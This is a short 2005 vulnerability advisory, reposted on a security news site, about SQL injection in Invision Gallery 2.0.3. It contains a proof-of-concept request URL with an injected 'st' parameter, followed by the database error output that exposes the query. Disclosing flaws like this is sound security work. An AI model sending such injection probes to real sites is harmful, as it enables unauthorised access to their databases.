Computer Security

Security Advisory: SQL In Invision Gallery 2.0.3
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Web applications security vulnerabilities (PHP, ASP, CGI, Perl, etc)

  Portcullis Security Advisory - Movable Type

  Secunia Research: cPanel Entropy Chat Script Insertion Vulnerability

  [Full-disclosure] Invision Power Board Privilege Escalation (2.0.1 + more)

  [SA17359] vBulletin Image Script Insertion Vulnerability

From:almaster_(at)_hotmail.com <almaster_(at)_hotmail.com>
Date:01.11.2005
Subject:SQL In Invision Gallery 2.0.3

Credit: By aLMaSTeR HaCKeR [ almaster@hotmail.com]

Vulnerable: Invision Gallery 2.0.3

EXPLIOT:

http://www.site.com/index.php?automodule=gallery&cmd=sc&cat=26&sort_k
ey=date&order_key=DESC&prune_key=30&st=|aLMaSTeR

The Error:

mySQL query error: SELECT i.*, m.members_display_name AS name, m.id AS mid, r.id as rated
               FROM ibf_gallery_images i   
                   LEFT JOIN ibf_members m ON ( m.id=i.member_id )
                   LEFT JOIN ibf_gallery_ratings r ON ( r.img_id=i.id AND r.member_id=0 )
               WHERE  category_id=26   AND  i.approved=1      
                   GROUP BY i.id
               ORDER BY pinned DESC, date DESC , i.id DESC  LIMIT ', 20
               

SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '', 20' at line 7
SQL error code:
Date: Sunday 30th of October 2005 04:53:19 PM

Thanks TO MY FRIENDS IN S4A.CC

almaster@s4a.cc or almaster@hotmail.com
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru